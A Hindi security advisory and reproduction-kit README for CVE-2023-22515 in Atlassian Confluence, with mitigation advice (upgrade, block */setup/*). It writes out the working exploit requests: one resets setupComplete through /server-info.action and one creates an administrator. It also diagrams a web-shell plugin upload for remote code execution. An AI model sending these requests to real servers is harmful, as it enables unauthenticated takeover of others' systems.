
[!IMPORTANT] आपातकालीन सुरक्षा चेतावनी: इस भेद्यता का CVSS स्कोर 10.0 (गंभीर) है, जो उच्चतम जोखिम स्तर है। यदि आप प्रभावित संस्करण का उपयोग कर रहे हैं, तो तत्काल पैच आवश्यक है।
CVE-2023-22515 Atlassian Confluence Data Center और Server में पाया गया एक घातक Broken Access Control भेद्यता है। हमलावर बिना प्रमाणीकरण के दूरस्थ रूप से सर्वर की कॉन्फ़िगरेशन स्थिति में हेरफेर कर सकता है, व्यवस्थापक खाता बना सकता है, और सिस्टम पर पूर्ण नियंत्रण प्राप्त कर सकता है।
| आइटम | विवरण |
|---|---|
| भेद्यता आईडी | CVE-2023-22515 |
| जोखिम स्तर | गंभीर (CVSS 10.0) |
| प्रभावित संस्करण | 8.0.0 ~ 8.5.1 (विस्तृत संस्करण की पुष्टि आवश्यक) |
| हमले का प्रकार | प्रमाणीकरण बाईपास और विशेषाधिकार वृद्धि |
यह भेद्यता हमलावर को /server-info.action एंडपॉइंट के माध्यम से bootstrapStatusProvider.applicationConfig.setupComplete मान को false में बदलने देती है, जिससे हमला ट्रिगर होता है।
sequenceDiagram
participant Attacker as 😈 हमलावर
participant Server as 🖥️ Confluence सर्वर
participant Config as ⚙️ कॉन्फ़िगरेशन प्रबंधक
Note over Attacker, Server: चरण 1: कॉन्फ़िगरेशन स्थिति रीसेट हमला
Attacker->>Server: GET /server-info.action?setupComplete=false
Server->>Config: मेमोरी में सेटअप पूर्ण फ़्लैग हटाना
Config-->>Server: स्थिति परिवर्तन पूर्ण (इंस्टॉल मोड में स्विच)
Server-->>Attacker: HTTP 200/302 OK
Note over Attacker, Server: चरण 2: व्यवस्थापक खाता निर्माण
Attacker->>Server: POST /setup/setupadministrator.action<br/>(नया व्यवस्थापक जानकारी भेजना)
Server->>Server: सुरक्षा सत्यापन बाईपास (इंस्टॉल मोड के कारण अनुमति)
Server-->>Attacker: खाता निर्माण सफल और लॉगिन
Note over Attacker, Server: चरण 3: सिस्टम पर कब्ज़ा (RCE)
Attacker->>Server: दुर्भावनापूर्ण प्लगइन अपलोड (वेब शेल)
Server-->>Attacker: दूरस्थ कमांड निष्पादन अधिकार प्राप्त
[!NOTE] मुख्य सिद्धांत: स्थायी कॉन्फ़िगरेशन फ़ाइल (
confluence.cfg.xml) को संशोधित नहीं किया जाता, बल्कि मेमोरी में रनटाइम स्थिति को बदलकर एक्सेस नियंत्रण तर्क को बायपास किया जाता है।
XWork2 फ्रेमवर्क की पैरामीटर बाइंडिंग भेद्यता और Confluence की एक्शन क्लास (ServerInfoAction) में संवेदनशील विशेषता (setupComplete) के लिए बाहरी इनपुट सत्यापन की कमी के कारण यह उत्पन्न हुआ।
हमलावर केवल एक साधारण HTTP अनुरोध से सर्वर को निष्क्रिय कर सकता है।
1. सेटअप रीसेट अनुरोध:
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: target-confluence.com
2. व्यवस्थापक निर्माण अनुरोध:
POST /setup/setupadministrator.action HTTP/1.1
...
username=hacker_admin&password=P@ssw0rd123...
इस रिपोर्ट के साथ प्रदान किया गया पुनरुत्पादन किट (cve-2023-22515-repro) सुरक्षित Docker वातावरण में भेद्यता का अभ्यास करने की अनुमति देता है।
टर्मिनल में वास्तविक हैकिंग प्रक्रिया को दृश्य रूप से देखने के लिए एक डेमो स्क्रिप्ट शामिल है।
# डेमो चलाने का आदेश
bash cinematic_pwn.sh
[!TIP] डेमो स्क्रिप्ट वास्तविक सर्वर (
localhost:8090) पर हमला करके व्यवस्थापक खाता बनाने और लॉगिन करने की पूरी प्रक्रिया को स्वचालित रूप से दिखाता है।
सबसे निश्चित समाधान Atlassian द्वारा प्रदान किए गए संशोधित संस्करणों में अपग्रेड करना है।
यदि पैच लागू करना कठिन है, तो नेटवर्क सुरक्षा उपकरणों (WAF, लोड बैलेंसर आदि) पर निम्नलिखित URL पैटर्न तक पहुँच को ब्लॉक करें।
*/setup/*CVE-2023-22515 एक बहुत ही कम हमला जटिलता वाली घातक भेद्यता है, जो सिस्टम पर पूर्ण नियंत्रण प्राप्त करने में सक्षम है। सुरक्षा अधिकारियों को तुरंत पैच लागू करना चाहिए और घुसपैठ की घटनाओं की निगरानी करनी चाहिए।
लेखन तिथि: 2026-01-16 | लेखक: एंटीग्रैविटी सुरक्षा विश्लेषण टीम